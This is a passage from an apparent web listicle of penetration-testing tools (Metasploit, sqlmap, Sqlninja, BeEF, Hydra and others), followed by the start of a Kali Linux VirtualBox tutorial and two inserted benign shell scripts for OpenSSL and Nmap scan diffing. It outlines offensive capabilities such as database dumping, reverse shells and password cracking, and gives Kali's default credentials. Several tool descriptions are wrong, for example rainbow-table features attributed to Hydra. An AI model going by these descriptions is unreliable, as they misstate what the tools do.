  • Live data can be read from Ethernet, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, etc.

  • Decryption support for many protocols, including IPsec, ISAKMP, SSL/TLS, WEP, and WPA/WPA2

  • For quick intuitive analysis, coloring rules can be applied to the packet

  • Read/Write many different capture file formats

Wireshark Download


8) w3af

w3af is a web application attack and audit framework. It has three types of plugins, discovery, audit and attack, which communicate with each other to find vulnerabilities in a site. For example, a discovery plugin in w3af looks for different URLs to test for vulnerabilities and forwards them to the audit plugin, which then uses these URLs to search for vulnerabilities.

It can also be configured to run as a MITM proxy. The intercepted request can be sent to the request generator, and manual web application testing can then be performed using variable parameters. It also has features to exploit the vulnerabilities that it finds.

w3af features

  • Proxy support

  • HTTP response cache

  • DNS cache

  • File uploading using multipart

  • Cookie handling

  • HTTP basic and digest authentication

  • User agent faking

  • Add custom headers to requests

w3af download link


9) Metasploit

This is the most popular and advanced framework that can be used for pentesting. It is an open source tool based on the concept of an 'exploit', which means you pass code that breaches the security measures and enters a certain system. Once in, it runs a 'payload', code that performs operations on the target machine, thus creating the perfect framework for penetration testing. It is also a great tool for testing whether the IDS succeeds in preventing the attacks used to bypass it.

Metasploit can be used on networks, applications, servers, etc. It has both a command-line and a clickable GUI interface, and works on Apple Mac OS X, Linux and Microsoft Windows.

Features of Metasploit

  • Basic command line interface

  • Third party import

  • Manual brute forcing

  • Website penetration testing

Metasploit download link


10) Kali

Kali works only on Linux machines. It enables you to create a backup and recovery schedule that fits your needs. It promotes a quick and easy way to find and update the largest database of security penetration testing tools to date. It is one of the best tools available for packet sniffing and injecting. Expertise in the TCP/IP protocol suite and networking is beneficial while using this tool.

Features

  • Addition of 64-bit support allows brute force password cracking

  • BackTrack comes with pre-loaded tools for LAN and WLAN sniffing, vulnerability scanning, password cracking, and digital forensics

  • BackTrack integrates with some of the best tools, like Metasploit and Wireshark

  • Besides network tools, it also includes Pidgin, XMMS, Mozilla, K3b, etc.

  • BackTrack supports KDE and GNOME.

Kali download link


11) Samurai Framework:

The Samurai Web Testing Framework is penetration testing software. It is supported on VirtualBox and VMware and has been pre-configured to function as a web pen-testing environment.

Features:

  • It is an open source, free-to-use tool

  • It contains the best of the open source and free tools that focus on testing and attacking websites

  • It also includes a pre-configured wiki to set up the central information store during the pen-test

Download link: https://sourceforge.net/projects/samurai/files/


12) Aircrack:

Aircrack is one of the handy tools used in wireless pen testing. It cracks vulnerable wireless connections that are protected by WEP, WPA and WPA2 encryption keys.

Features:

  • More cards/drivers supported

  • Supports all types of OS and platforms

  • New WEP attack: PTW

  • Support for WEP dictionary attack

  • Support for Fragmentation attack

  • Improved tracking speed

Download link: https://www.aircrack-ng.org/downloads.html


13) ZAP:

ZAP is one of the most popular open source security testing tools. It is maintained by hundreds of international volunteers. It can help users find security vulnerabilities in web applications during the development and testing phases.

Features:

  • It helps to identify the security holes present in the web application by simulating an actual attack

  • Passive scanning analyses the responses from the server to identify certain issues

  • It attempts brute force access to files and directories.

  • The spidering feature helps to construct the hierarchical structure of the website

  • It can supply invalid or unexpected data to the application to crash it or to produce unexpected results

  • Helpful tool to find the open ports on the target website

  • It provides an interactive Java shell which can be used to execute BeanShell scripts

  • It is fully internationalized and supports 11 languages

Download link: https://github.com/zaproxy/zaproxy/wiki


14) Sqlmap:

Sqlmap is an open source penetration testing tool. It automates the entire process of detecting and exploiting SQL injection flaws. It comes with many detection engines and features for an ideal penetration test.

Features:

  • Full support for six SQL injection techniques

  • Allows a direct connection to the database without going through a SQL injection

  • Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns

  • Automatic recognition of passwords given in hash formats and support for cracking them

  • Support to dump database tables entirely or specific columns

  • The user can also select a range of characters from each column's entry

  • Allows establishing a TCP connection between the affected system and the database server

  • Support to search for specific database names, tables or specific columns across all databases and tables

  • Allows executing arbitrary commands and retrieving their standard output on the database server

Download link: https://github.com/sqlmapproject/sqlmap


15) Sqlninja:

Sqlninja is a penetration testing tool. It is aimed at exploiting SQL Injection vulnerabilities in web applications that use Microsoft SQL Server as the back-end. It also provides remote access to the vulnerable DB server, even in a very hostile environment.

Features:

  • Fingerprinting of the remote SQL Server

  • Data extraction, time-based or using a DNS tunnel

  • Allows integration with Metasploit3 to obtain graphical access to the remote DB server

  • Upload of executables using only normal HTTP requests, via VBScript or debug.exe

  • Direct and reverse bindshell, both for TCP and UDP

  • Creation of a custom xp_cmdshell if the original one is not available on w2k3, using token kidnapping

Download link: http://sqlninja.sourceforge.net/download.html


16) BeEF:

BeEF, the Browser Exploitation Framework, is a pen testing tool that focuses on the web browser. It uses GitHub to track issues and host its git repository.

Features:

  • It allows checking the actual security posture by using client-side attack vectors

  • BeEF allows hooking one or more web browsers. These can then be used for launching directed command modules and further attacks on the system.

Download link: http://beefproject.com


17) Dradis:

Dradis is an open source framework for penetration testing. It allows maintaining information that can be shared among the participants of a pen-test. The information collected helps users to understand what is completed and what still needs to be completed.

Features:

  • Easy process for report generation

  • Support for attachments

  • Seamless collaboration

  • Integration with existing systems and tools using server plugins

  • Platform independent

Download link: https://dradisframework.com/ce


18) Rapid 7:

Nexpose Rapid 7 is a useful vulnerability management software. It monitors exposures in real-time and adapts to new threats with fresh data which helps users to act at the moment of impact.

Features:

  • Get a Real-Time View of Risk

  • It brings innovative and progressive solutions that help the user to get their jobs done

  • Know Where to Focus

  • Bring More to Your Security Program

Download link: https://www.rapid7.com/products/nexpose/download/


19) Hping:

Hping is a TCP/IP packet analyzer pen testing tool. Its interface is inspired by the ping(8) UNIX command. It supports the TCP, ICMP, UDP, and RAW-IP protocols.

Features:

  • Allows firewall testing

  • Advanced port scanning

  • Network testing, using different protocols, TOS, fragmentation

  • Manual path MTU discovery

  • Advanced traceroute with all the supported protocols

  • Remote OS fingerprinting & uptime guessing

  • TCP/IP stack auditing

Download link: https://github.com/antirez/hping


20) SuperScan:

Superscan is a free Windows-only closed-source penetration testing tool. It also includes networking tools such as ping, traceroute, whois and HTTP HEAD.

Features:

  • Superior scanning speed

  • Support for unlimited IP ranges

  • Improved host detection using multiple ICMP methods

  • Provides support for TCP SYN scanning

  • Simple HTML report generation

  • Source port scanning

  • Extensive banner grabbing

  • Large built-in port list description database

  • IP and port scan order randomization

  • Extensive Windows host enumeration capability

Download link: https://www.mcafee.com/in/downloads/free-tools/termsofuse.aspx


21) ISS Scanner:

The IBM Internet Scanner is a pen testing tool which offers the foundation for effective network security for any business.

Features:

  • Internet Scanner minimizes business risk by finding the weak spots in the network

  • It allows automating scans and discovering vulnerabilities

  • Internet Scanner cuts risk by identifying the security holes, or vulnerabilities, in the network

  • Complete Vulnerability Management

  • Internet Scanner can identify more than 1,300 types of networked devices

Download link: https://www-01.ibm.com/software/info/trials


22) Scapy:

Scapy is a powerful and interactive pen testing tool. It can handle many classical tasks like scanning, probing, and attacks on the network.

Features:

  • It performs specific tasks such as sending invalid frames and injecting 802.11 frames, and it can combine techniques in ways that are hard to do with other tools

  • It allows users to build exactly the packets they want

  • Reduces the number of lines written to execute the specific code

Download link: http://secdev.org/projects/scapy/


23) IronWASP:

IronWASP is an open source software for web application vulnerability testing. It is designed to be customizable so that users can create their custom security scanners using it.

Features:

  • GUI based and very easy to use

  • It has a powerful and effective scanning engine

  • Support for recording login sequences

  • Reporting in both HTML and RTF formats

  • Checks for over 25 types of web vulnerabilities

  • Support for detecting false positives and negatives

  • It supports Python and Ruby

  • Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET

Download link: http://ironwasp.org/download.html


24) Ettercap:

Ettercap is a comprehensive pen testing tool. It supports active and passive dissection. It also includes many features for network and host analysis.

Features:

  • It supports active and passive dissection of many protocols

  • ARP poisoning feature to sniff on a switched LAN between two hosts

  • Characters can be injected into a server or a client while maintaining a live connection

  • Ettercap is capable of sniffing an SSH connection in full duplex

  • Allows sniffing of HTTP SSL-secured data even when the connection is made through a proxy

  • Allows creation of custom plugins using Ettercap's API

Download link: https://ettercap.github.io/ettercap/downloads.html


25) Security Onion:

Security Onion is a penetration testing tool. It is used for intrusion detection and network security monitoring. It has an easy-to-use setup wizard that allows users to build an army of distributed sensors for their enterprise.

Features:

  • It is built on a distributed client-server model

  • Network Security Monitoring allows monitoring for security-related events

  • It offers full packet capture

  • Network-based and host-based intrusion detection systems

  • It has a built-in mechanism to purge old data before the storage device fills to capacity

Download link: https://securityonion.net/


26) Personal Software Inspector:

Personal Software Inspector is an open source computer security solution. This tool can identify vulnerabilities in applications on a PC or a server.

Features:

  • It is available in eight different languages

  • Automates the updates for insecure programs

  • It covers thousands of programs and automatically detects insecure programs

  • This pen testing tool automatically and regularly scans the PC for vulnerable programs

  • Detects and notifies programs that can't be automatically updated

Download link: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector


27) HconSTF:

HconSTF is an open source penetration testing tool based on different browser technologies. It helps any security professional with penetration testing. It contains web tools which are powerful for XSS, SQL injection, CSRF, Trace XSS, RFI, LFI, etc.

Features:

  • Categorized and comprehensive toolset

  • Every option is configured for penetration testing

  • Specially configured and enhanced for gaining solid anonymity

  • Works for web app testing assessments

  • Easy to use & collaborative operating system

Download link: http://www.hcon.in/


28) IBM Security AppScan:

IBM Security AppScan helps to enhance web application security and mobile application security. It improves application security and strengthens regulatory compliance. It helps users to identify security vulnerabilities and generate reports.

Features:

  • Enable Development and QA to perform testing during SDLC process

  • Control what applications each user can test

  • Easily distribute reports

  • Increase visibility and better understand enterprise risks

  • Focus on finding and fixing issues

  • Control the access of information

Download link: http://www-03.ibm.com/software/products/en/appscan


29) Arachni:

Arachni is an open source, Ruby-framework-based tool for penetration testers & administrators. It is used for evaluating the security of modern web applications.

Features:

  • It is a versatile tool, so it covers a large number of use cases, ranging from a simple command-line scanner utility to a global high-performance grid of scanners

  • Option for multiple deployments

  • It offers a verifiable, inspectable code base to ensure the highest level of protection

  • It can easily integrate with a browser environment

  • It offers highly detailed and well-structured reports

Download link: https://sourceforge.net/projects/safe3wvs/files


30) Websecurify:

Websecurify is a powerful security testing environment. It has a user-friendly interface which is simple and easy to use. It offers a combination of automatic and manual vulnerability testing technologies.

Features:

  • Good testing and scanning technology

  • Strong testing engine to detect URLs

  • It is extensible with many available add-ons

  • It is available for all the major desktop and mobile platforms

Download link: https://www.websecurify.com/


31) Vega:

Vega is an open source web security scanner and pen testing platform to test the security of web applications.

Features:

  • Automated, Manual, and Hybrid Security Testing

  • It helps users to find vulnerabilities such as cross-site scripting, stored cross-site scripting, blind SQL injection, shell injection, etc.

  • It can automatically log into websites when supplied with user credentials

  • It runs effectively on Linux, OS X, and Windows

  • Vega detection modules are written in JavaScript

Download link: https://subgraph.com/vega/download/index.en.html


32) Wapiti:

Wapiti is another well-known penetration testing tool. It allows auditing the security of web applications. It supports both the GET and POST HTTP methods for vulnerability checks.

Features:

  • Generates vulnerability reports in various formats

  • It can suspend and resume a scan or an attack

  • Fast and easy way to activate and deactivate attack modules

  • Supports HTTP and HTTPS proxies

  • It allows restricting the scope of the scan

  • Automatic removal of a parameter in URLs

  • Import of cookies

  • It can activate or deactivate SSL certificate verification

  • Extract URLs from Flash SWF files

Download link: https://sourceforge.net/projects/wapiti/files/


33) Kismet:

Kismet is a wireless network detector and intrusion detection system. It works with Wi-Fi networks but can be expanded via plugins to handle other network types.

Features:

  • Allows standard PCAP logging

  • Client/Server modular architecture

  • Plug-in architecture to expand core features

  • Multiple capture source support

  • Distributed remote sniffing via light-weight remote capture

  • XML output for integration with other tools

Download link: https://www.kismetwireless.net/download.shtml


34) Kali Linux:

Kali Linux is an open source pen testing tool which is maintained and funded by Offensive Security.

Features:

  • Full customization of Kali ISOs with live-build to create customized Kali Linux images

  • It contains a number of metapackage collections which aggregate different tool sets

  • ISO of Doom and Other Kali Recipes

  • Disk Encryption on Raspberry Pi 2

  • Live USB with Multiple Persistence Stores

Download link: https://www.kali.org/


35) Parrot Security:

Parrot Security is a pen testing tool. It offers a fully portable laboratory for security and digital forensics experts. It also helps users to protect their privacy with anonymity and crypto tools.

Features:

  • It includes a full arsenal of security-oriented tools to perform penetration tests, security audits and more.

  • It comes with preinstalled, useful and updated libraries

  • Offers powerful worldwide mirror servers

  • Allows community-driven development

  • Offers a separate Cloud OS specifically designed for servers

Download link: https://www.parrotsec.org/download.fx


36) OpenSSL:

This toolkit is licensed under an Apache-style license. It is a free and open source project that provides a full-featured toolkit for the TLS and SSL protocols.

Features:

  • It is written in C, but wrappers are available for many programming languages

  • The library includes tools for generating RSA private keys and Certificate Signing Requests

  • Verify a CSR file

  • Completely remove the passphrase from a key

  • Create a new private key and Certificate Signing Request

Download link: https://www.openssl.org/source/
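The key generation, CSR creation, CSR verification and passphrase-removal tasks in the feature list above, carried out with the openssl command line. This is an added example, not code from the page or from the OpenSSL project; it assumes the openssl binary is on the PATH, and the subject /CN=example.test and the passphrase demo-pass are placeholders.

```shell
#!/bin/sh
# Added example (not from the page or the OpenSSL project): the CLI workflow
# behind the OpenSSL feature list: generate an RSA key, build and verify a CSR,
# then remove the passphrase from an encrypted copy of the key.
# Assumptions: openssl is on PATH; "/CN=example.test" and "demo-pass" are
# placeholders.
set -e
WORK="${TMPDIR:-/tmp}/openssl-demo.$$"
mkdir -p "$WORK" && chmod 700 "$WORK"   # private keys live here; keep it private

# 1) Generate a 2048-bit RSA private key (PEM, unencrypted).
gen_key() {
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$WORK/server.key" 2>/dev/null
    chmod 600 "$WORK/server.key"
}

# 2) Create a Certificate Signing Request for that key; -subj skips the prompts.
gen_csr() {
    openssl req -new -key "$WORK/server.key" -subj "/CN=example.test" \
        -out "$WORK/server.csr" 2>/dev/null
}

# 3) Verify the CSR: OpenSSL checks the request's self-signature, which shows
#    the requester holds the private key matching the public key in the CSR.
#    The exit status is non-zero if the signature or the file is bad.
verify_csr() {
    openssl req -in "$WORK/server.csr" -noout -verify >/dev/null 2>&1
}

# 4) Encrypt the key with a passphrase (AES-256), the form in which keys are
#    usually handed around, then strip the passphrase so a service can load it
#    at boot without a prompt. A passphrase-less key is protected only by file
#    permissions, so both copies are created mode 0600.
encrypt_key() {
    openssl rsa -in "$WORK/server.key" -aes256 -passout pass:demo-pass \
        -out "$WORK/server.enc.key" 2>/dev/null
    chmod 600 "$WORK/server.enc.key"
}
strip_passphrase() {
    openssl rsa -in "$WORK/server.enc.key" -passin pass:demo-pass \
        -out "$WORK/server.plain.key" 2>/dev/null
    chmod 600 "$WORK/server.plain.key"
}

# Cross-check: the public key inside the CSR must equal the one derived from
# the decrypted private key; a mismatch means the wrong key was decrypted.
keys_match() {
    csr_pub=$(openssl req -in "$WORK/server.csr" -noout -pubkey)
    key_pub=$(openssl pkey -in "$WORK/server.plain.key" -pubout)
    [ -n "$csr_pub" ] && [ "$csr_pub" = "$key_pub" ]
}

# Returns 0 only when every step succeeded.
run_demo() {
    gen_key && gen_csr && verify_csr && encrypt_key && strip_passphrase && keys_match
}

run_demo && echo "CSR verified and passphrase removed: keys match"
```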


37) Snort:

Snort is an open-source intrusion detection and pen testing system. It offers the benefits of signature-, protocol- and anomaly-based inspection methods. This tool helps users to get maximum protection from malware attacks.

Features:

  • Snort gained notoriety for being able to detect threats accurately at high speeds

  • Protect your workspace from emerging attacks quickly

  • Snort can be used to create customized, unique network security solutions

  • Test the SSL certificate of a particular URL

  • It can check if a particular cipher is accepted on a URL

  • Verify the Certificate Signer Authority

  • Ability to submit false positives/negatives

Download link: https://www.snort.org/downloads


38) Backbox:

BackBox is an Open Source Community project with the objective of enhancing the culture of security in IT environments. It is available in two different variants, BackBox Linux and BackBox Cloud. It includes some of the most commonly known/used security and analysis tools.

Features:

  • It is a helpful tool to reduce company resource needs and lower the costs of managing multiple network device requirements

  • It is a fully automated pen testing tool, so no agents and no network configuration changes are needed in order to perform scheduled automated configuration

  • Secure access to devices

  • Organizations can save time as there is no need to track individual network devices

  • Supports credential and configuration file encryption

  • Self-backup and automatic remote storage

  • Offers IP-based access control

  • No need to write commands, as it comes with pre-configured commands

Download link: https://backbox.org/download


39) THC Hydra:

Hydra is a parallelized login cracker and pen testing tool. It is very fast and flexible, and new modules are easy to add. This tool allows researchers and security consultants to find unauthorized access.

Features:

  • Full time-memory trade-off tool suite, along with rainbow table generation, sorting, conversion and lookup

  • It supports rainbow tables for any hash algorithm

  • Supports rainbow tables for any charset

  • Supports rainbow tables in compact or raw file format

  • Support for computation on multi-core processors

  • Runs on Windows and Linux operating systems

  • Unified rainbow table file format on all supported OSes

  • Supports both GUI and command-line user interfaces

Download link: https://github.com/vanhauser-thc/thc-hydra


40) Reputation Monitor Alert:

Open Threat Exchange Reputation Monitor is a free service. It allows professionals to track their organization's reputation. With the help of this tool, businesses and organizations can track the public IP and domain reputation of their assets.

Features:

  • Monitors cloud, hybrid cloud, and on-premises infrastructure

  • Delivers continuous threat intelligence to keep you updated about threats as they emerge

  • Provides the most comprehensive threat detection and actionable incident response directives

  • Deploys quickly, easily, and with less effort

  • Reduces TCO over traditional security solutions

Download link: https://www.alienvault.com/try-it-free?utm_internal=sb_freetrial_modal


41) John the Ripper:

John the Ripper, known as JTR, is a very popular password cracking tool. It is primarily used to perform dictionary attacks. It helps identify weak password vulnerabilities in a network. It also supports brute force and rainbow crack attacks.

Features:

  • John the Ripper is free and Open Source software

  • Proactive password strength checking module

  • It allows online browsing of the documentation

  • Support for many additional hash and cipher types

  • Allows browsing the documentation online, including a summary of changes between two versions

Download link: http://www.openwall.com/john/


42) Safe3 scanner:

Safe3WVS is one of the most powerful web vulnerability testing tools. It comes with web spider crawling technology, especially for web portals. It is the fastest tool to find issues like SQL injection, upload vulnerabilities, and more.

Features:

  • Full support for Basic, Digest and HTTP authentication.

  • Intelligent web spider automatically removes repeated web pages

  • An automatic JavaScript analyzer provides support for extracting URLs from Ajax, Web 2.0 and any other applications

  • Support to scan for SQL injection, upload vulnerabilities, admin paths and directory listing vulnerabilities

Download link: https://sourceforge.net/projects/safe3wvs/files/latest/download


43) CloudFlare:

CloudFlare is a CDN with robust security features. Online threats range from comment spam and excessive bot crawling to malicious attacks like SQL injection. It provides protection against comment spam, excessive bot crawling, and malicious attacks.

Features:

  • It is an enterprise-class DDoS protection network

  • Its web application firewall benefits from the collective intelligence of the entire network

  • Registering a domain using CloudFlare is the most secure way to protect against domain hijacking

  • The Rate Limiting feature protects users' critical resources. It blocks visitors with a suspicious request rate.

  • CloudFlare Orbit solves security issues for IoT devices

Download link: https://www.cloudflare.com/


44) Zenmap

Zenmap is the official GUI for the Nmap Security Scanner. It is a multi-platform, free and open source application. It is easy to use for beginners but also offers advanced features for experienced users.

Features:

  • Interactive and graphical results viewing

  • It summarizes details about a single host or a complete scan in a convenient display.

  • It can even draw a topology map of discovered networks.

  • It can show the differences between two scans.

  • It allows administrators to track new hosts or services appearing on their networks, or existing services that go down

Download link: https://nmap.org/download.html
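The last two features, comparing two scans and tracking hosts or services that appear or disappear, done from the shell over Nmap's grepable output format (nmap -oG). This is an added example, not code from the page or from the Nmap project; the two scan files it parses are constructed samples, and the addresses and host names in them are assumptions.

```shell
#!/bin/sh
# Added example (not from the page or the Nmap project): diff two scans saved
# with "nmap -oG" to report new hosts, newly open services and services that
# have gone away. Both scan files below are constructed samples; the addresses
# and host names are assumptions.
set -e
export LC_ALL=C                     # byte-order sort so comm(1) agrees with sort(1)
WORK="${TMPDIR:-/tmp}/gnmap-diff.$$"
mkdir -p "$WORK"
OLD_SCAN="$WORK/baseline.gnmap"
NEW_SCAN="$WORK/today.gnmap"

# Grepable format: tab-separated fields per host; each port entry is
# port/state/proto/owner/service/rpc/version/ (fields may be empty).
write_samples() {
    {
        printf '# Nmap 7.80 scan initiated (constructed baseline sample)\n'
        printf 'Host: 10.0.0.5 (web01.test)\tStatus: Up\n'
        printf 'Host: 10.0.0.5 (web01.test)\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 80/open/tcp//http//nginx/\tIgnored State: closed (998)\n'
        printf 'Host: 10.0.0.9 (db01.test)\tStatus: Up\n'
        printf 'Host: 10.0.0.9 (db01.test)\tPorts: 22/open/tcp//ssh///, 3306/open/tcp//mysql///\tIgnored State: closed (998)\n'
        printf '# Nmap done -- 2 IP addresses (2 hosts up)\n'
    } > "$OLD_SCAN"
    {
        printf '# Nmap 7.80 scan initiated (constructed follow-up sample)\n'
        printf 'Host: 10.0.0.5 (web01.test)\tStatus: Up\n'
        printf 'Host: 10.0.0.5 (web01.test)\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 8080/open/tcp//http-proxy///\tIgnored State: closed (998)\n'
        printf 'Host: 10.0.0.9 (db01.test)\tStatus: Up\n'
        printf 'Host: 10.0.0.9 (db01.test)\tPorts: 22/open/tcp//ssh///, 3306/filtered/tcp//mysql///\tIgnored State: closed (998)\n'
        printf 'Host: 10.0.0.12 ()\tStatus: Up\n'
        printf 'Host: 10.0.0.12 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (999)\n'
        printf '# Nmap done -- 3 IP addresses (3 hosts up)\n'
    } > "$NEW_SCAN"
}

# Print one "ip port/proto service" line per open port, sorted.
open_services() {
    awk -F'\t' '
        /^Host:/ {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                n = split(substr($i, 8), ports, ", ")
                for (j = 1; j <= n; j++) {
                    split(ports[j], f, "/")
                    if (f[2] != "open") continue
                    print ip, f[1] "/" f[3], (f[5] == "" ? "-" : f[5])
                }
            }
        }' "$1" | sort
}

# Print every address that answered, one per line, sorted and de-duplicated.
live_hosts() {
    awk '/^Host:/ { print $2 }' "$1" | sort -u
}

# Set differences via comm(1): -13 keeps lines only in the new file,
# -23 keeps lines only in the old file.
new_hosts() {
    live_hosts "$1" > "$WORK/h.old"; live_hosts "$2" > "$WORK/h.new"
    comm -13 "$WORK/h.old" "$WORK/h.new"
}
new_services() {
    open_services "$1" > "$WORK/s.old"; open_services "$2" > "$WORK/s.new"
    comm -13 "$WORK/s.old" "$WORK/s.new"
}
gone_services() {
    open_services "$1" > "$WORK/s.old"; open_services "$2" > "$WORK/s.new"
    comm -23 "$WORK/s.old" "$WORK/s.new"
}

write_samples
echo "== new hosts";         new_hosts "$OLD_SCAN" "$NEW_SCAN"
echo "== new open services"; new_services "$OLD_SCAN" "$NEW_SCAN"
echo "== services gone";     gone_services "$OLD_SCAN" "$NEW_SCAN"
```

A port that changed from open to filtered (3306 above) shows up under "services gone", which is the signal an administrator would follow up on.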

The other tools that might be useful for penetration testing are

  • Acunetix: It is a web vulnerability scanner targeted at web applications. It is an expensive tool compared to others and provides facilities like cross-site scripting testing, PCI compliance reports, SQL injection, etc.

  • Retina: It is more like a vulnerability management tool than a pen-testing tool

  • Nessus: It concentrates on compliance checks, sensitive data searches, IP scans, website scanning, etc.

  • Netsparker: This tool comes with a robust web application scanner that identifies vulnerabilities and suggests solutions. Free limited trials are available, but most of the time it is a commercial product. It also helps to exploit SQL injection and LFI (Local File Inclusion)

  • CORE Impact: This software can be used for mobile device penetration, password identification and cracking, network device penetration, etc. It is one of the more expensive tools in software testing

  • Burp Suite: Like the others, this software is also a commercial product. It works as an intercepting proxy and performs web application scanning, crawling of content and functionality, etc. The advantage of using Burp Suite is that you can use it on Windows, Linux and Mac OS X environments.



Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap

What is Kali Linux?

Kali Linux is a security distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through a rewrite of BackTrack, their previous information security operating system. The first iteration of Kali Linux, Kali 1.0.0, was introduced in March 2013. Offensive Security currently funds and supports Kali Linux. If you were to visit Kali's website today (www.kali.org), you would see a large banner stating, "Our Most Advanced Penetration Testing Distribution, Ever." A very bold statement that ironically has yet to be disproven.

Kali Linux has over 600 preinstalled penetration-testing applications to discover, each with its own flexibility and use case. Kali Linux does an excellent job of separating these useful utilities into the following categories:

  1. Information Gathering

  2. Vulnerability Analysis

  3. Wireless Attacks

  4. Web Applications

  5. Exploitation Tools

  6. Stress Testing

  7. Forensics Tools

  8. Sniffing & Spoofing

  9. Password Attacks

  10. Maintaining Access

  11. Reverse Engineering

  12. Reporting Tools

  13. Hardware Hacking


Who uses Kali Linux and Why?

Kali Linux is truly a unique operating system, as it is one of the few platforms openly used by both good guys and bad guys. Security administrators and black hat hackers both use this operating system extensively: one to detect and prevent security breaches, the other to identify and possibly exploit them. The number of tools configured and preinstalled on the operating system makes Kali Linux the Swiss Army knife in any security professional's toolbox.

Professionals that use Kali Linux

  1. Security Administrators – Security Administrators are responsible for safeguarding their institution's information and data. They use Kali Linux to review their environment(s) and ensure there are no easily discoverable vulnerabilities.

  2. Network Administrators – Network Administrators are responsible for maintaining an efficient and secure network. They use Kali Linux to audit their network. For example, Kali Linux has the ability to detect rogue access points.

  3. Network Architects – Network Architects are responsible for designing secure network environments. They utilize Kali Linux to audit their initial designs and ensure nothing was overlooked or misconfigured.

  4. Pen Testers – Pen Testers utilize Kali Linux to audit environments and perform reconnaissance on corporate environments which they have been hired to review.

  5. CISO – CISOs, or Chief Information Security Officers, use Kali Linux to internally audit their environment and discover if any new applications or rogue configurations have been put in place.

  6. Forensic Engineers – Kali Linux possesses a "Forensic Mode", which allows a Forensic Engineer to perform data discovery and recovery in some instances.

  7. White Hat Hackers – White Hat Hackers, similar to Pen Testers, use Kali Linux to audit and discover vulnerabilities which may be present in an environment.

  8. Black Hat Hackers – Black Hat Hackers utilize Kali Linux to discover and exploit vulnerabilities. Kali Linux also has numerous social engineering applications, which can be utilized by a Black Hat Hacker to compromise an organization or individual.

  9. Grey Hat Hackers – Grey Hat Hackers lie in between White Hat and Black Hat Hackers. They will utilize Kali Linux in the same ways as the two listed above.

  10. Computer Enthusiasts – Computer Enthusiast is a pretty generic term, but anyone interested in learning more about networking or computers in general can use Kali Linux to learn more about Information Technology, networking, and common vulnerabilities.

Kali Linux Installation Methods

Kali Linux can be installed using the following methods:

Ways to Run Kali Linux:

  1. Directly on a PC, Laptop – Utilizing a Kali ISO image, Kali Linux can be installed directly onto a PC or Laptop. This method is best if you have a spare PC and are familiar with Kali Linux. Also, if you plan or doing any access point testing, installing Kali Linux directly onto Wi-Fi enabled laptop is recommended.

  2. Virtualized (VMware, Hyper-V, Oracle VirtualBox, Citrix) – Kali Linux supports most known hypervisors and can easily be installed into the most popular ones. Pre-configured images are available for download from www.kali.org, or an ISO can be used to install the operating system into the preferred hypervisor manually.

  3. Cloud (Amazon AWS, Microsoft Azure) – Given the popularity of Kali Linux, both AWS and Azure provide images for Kali Linux.

  4. USB Boot Disc – Utilizing Kali Linux's ISO, a boot disc can be created to either run Kali Linux on a machine without actually installing it or for Forensic purposes.

  5. Windows 10 (App) – Kali Linux can now natively run on Windows 10, via the Command Line. Not all features work yet as this is still in beta mode.

  6. Mac (Dual or Single boot) – Kali Linux can be installed on Mac, as a secondary operating system or as the primary. Parallels or Mac's boot functionality can be utilized to configure this setup.

Install Kali Linux using Virtual Box

The easiest method and arguably the most widely used is installing Kali Linux and running it from Oracle's VirtualBox.

This method allows you to continue to use your existing hardware while experimenting with the feature-enriched Kali Linux in a completely isolated environment. Best of all, everything is free: both Kali Linux and Oracle VirtualBox are free to use. This tutorial assumes you have already installed Oracle's VirtualBox on your system and have enabled 64-bit virtualization via the BIOS.

Step 1) Go to https://images.offensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova

This will download an OVA image, which can be imported into VirtualBox

Step 2) Open the Oracle VirtualBox application, and from the File menu select Import Appliance

File Menu -> Import Appliance

Step 3) On the following screen "Appliance to Import" Browse to the location of the downloaded OVA file and click Open

Step 4) Once you click Open, you will be taken back to the "Appliance to Import" screen; simply click Next

Step 5) The following screen, "Appliance Settings", displays a summary of the system's settings; leaving the default settings is fine. As shown in the screenshot below, make a note of where the Virtual Machine is located and then click Import.

Step 6) VirtualBox will now Import the Kali Linux OVA appliance. This process could take anywhere from 5 to 10 minutes to complete.

Step 7) Congratulations, Kali Linux has been successfully installed on VirtualBox. You should now see the Kali Linux VM in the VirtualBox Console. Next, we'll take a look at Kali Linux and some initial steps to perform.

Step 8) Click on the Kali Linux VM within the VirtualBox Dashboard and click Start; this will boot up the Kali Linux Operating System.

Step 9) On the login screen, enter "Root" as the username and click Next.

Step 10) As mentioned earlier, enter "toor" as the password and click SignIn.

You will now be presented with the Kali Linux GUI Desktop. Congratulations, you have successfully logged into Kali Linux.

Getting Started with Kali Linux GUI

The Kali Desktop has a few tabs you should initially make a note of and become familiar with. Applications Tab, Places Tab, and the Kali Linux Dock.

Applications Tab – Provides a graphical dropdown list of all the applications and tools pre-installed on Kali Linux. Reviewing the Applications Tab is a great way to become familiar with the feature-enriched Kali Linux Operating System. Two applications we'll discuss in this tutorial are Nmap and Metasploit. The applications are placed into different categories, which makes searching for an application much easier.

Accessing Applications

Step 1) Click on Applications Tab

Step 2) Browse to the particular category you're interested in exploring

Step 3) Click on the Application you would like to start.

Places Tab – Similar to any other GUI Operating System, such as Windows or Mac, easy access to your Folders, Pictures and My Documents is an essential component. Places on Kali Linux provides that accessibility that is vital to any Operating System. By default, the Places menu has the following tabs, Home, Desktop, Documents, Downloads, Music, Pictures, Videos, Computer and Browse Network.

Accessing Places

Step 1) Click on the Places Tab

Step 2) Select the location you would like to access.

Kali Linux Dock – Similar to Apple Mac's Dock or Microsoft Windows Task Bar, the Kali Linux Dock provides quick access to frequently used / favorite applications. Applications can be added or removed easily.

To Remove an Item from the Dock

Step 1) Right-Click on the Dock Item

Step 2) Select Remove From Favorites

To Add Item to Dock

Adding an item to the Dock is very similar to removing an item from the Dock

Step 1) Click on the Show Applications button at the bottom of the Dock

Step 2) Right Click on Application

